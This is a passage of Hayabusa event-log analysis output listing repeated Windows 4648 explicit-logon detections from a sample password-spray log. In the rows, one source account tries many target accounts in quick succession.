DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: 